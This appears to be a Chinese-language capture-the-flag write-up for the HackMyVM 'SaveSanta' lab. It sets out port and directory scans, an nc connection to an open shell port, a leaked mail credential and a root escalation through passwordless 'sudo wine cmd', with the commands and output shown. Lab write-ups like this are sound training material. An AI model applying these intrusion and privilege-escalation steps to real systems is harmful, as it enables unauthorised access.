简介
难度:简单
靶场地址:https://hackmyvm.eu/machines/machine.php?vm=SaveSanta
本地环境
虚拟机:vitual box
靶场IP(SaveSanta):192.168.56.103
渗透机IP(windows 10):192.168.56.1
扫描
随便扫一下常用端口
http
python3 dirsearch.py -e php -t 10 -x 403 -u http://192.168.56.103/
_|. _ _ _ _ _ _|_ v0.4.3 by 鹏组安全
(_||| _) (/_(_|| (_| )
Extensions: php | HTTP method: GET | Threads: 10 | Wordlist size: 9567
Output File: E:\1_tool\12_HVV\ONE-FOX集成工具箱_V6公开版_by狐狸\gui_scan\dirsearch\reports\http_192.168.56.103\__24-03-19_17-26-01.txt
Target: http://192.168.56.103/
[17:26:01] Starting:
[17:26:07] 301 - 245B - /administration -> http://192.168.56.103/administration/
[17:26:07] 301 - 240B - /administration/ -> http://192.168.56.103/media.html
[17:26:07] 301 - 240B - /administration/Sym.php -> http://192.168.56.103/media.html
[17:26:14] 301 - 241B - /javascript -> http://192.168.56.103/javascript/
[17:26:21] 200 - 69B - /robots.txt
Task Completeds
然而这几个路径看过之只有robots.txt有东西
Disallow: /
Disallow: /administration/
Disallow: /santa
/administrator重定向到http://192.168.56.103/media.html
/santa是一个登录界面
本来还想继续打点,结果除了这一次以后再也进不了这个界面了。
怎么扫也找不到新东西,以为是网站崩了。重启一下靶机,然后再扫一遍全端口,结果是意外收获
nmap -T5 -sS -Pn -p 1-65530 192.168.56.103
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-19 18:25 CST
Nmap scan report for 192.168.56.103
Host is up (0.00020s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
25/tcp open smtp
80/tcp open http
110/tcp open pop3
49956/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 19.86 seconds
nc连上去,拿到shell
rlwrap -cAr nc 192.168.56.103 49956
ls
user.txt
whoami
alabaster
拿到user的flag
rlwarp是用来优化反弹shell交互的,nc的时候用这个前置一下没有坏处。
提权
升级一下shell
/usr/bin/script -qc /bin/bash /dev/null
把linpeas传上去,看到mail有漏洞
这个漏洞本身倒不能直接用,不过说明了用户肯定起了mail相关的服务。输入mail一看,便发现一封邮件:
关键信息:
bill/JingleBellsPhishingSmellsHackersGoAway
ssh连上去,成功进入bill用户
sudo -l,看到可以无密码执行wine
bill@santa:/$ sudo -l
Matching Defaults entries for bill on santa:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User bill may run the following commands on santa:
(ALL) NOPASSWD: /usr/bin/wine
wine是用来模拟windows环境的,所以我们可以直接执行cmd来获得"windows"的shell
sudo wine cmd
Z:\home\bill>whoami
0118:err:winediag:ntlm_check_version ntlm_auth was not found. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
0118:err:ntlm:ntlm_LsaApInitializePackage no NTLM support, expect problems
SANTA\root
至此拿到root权限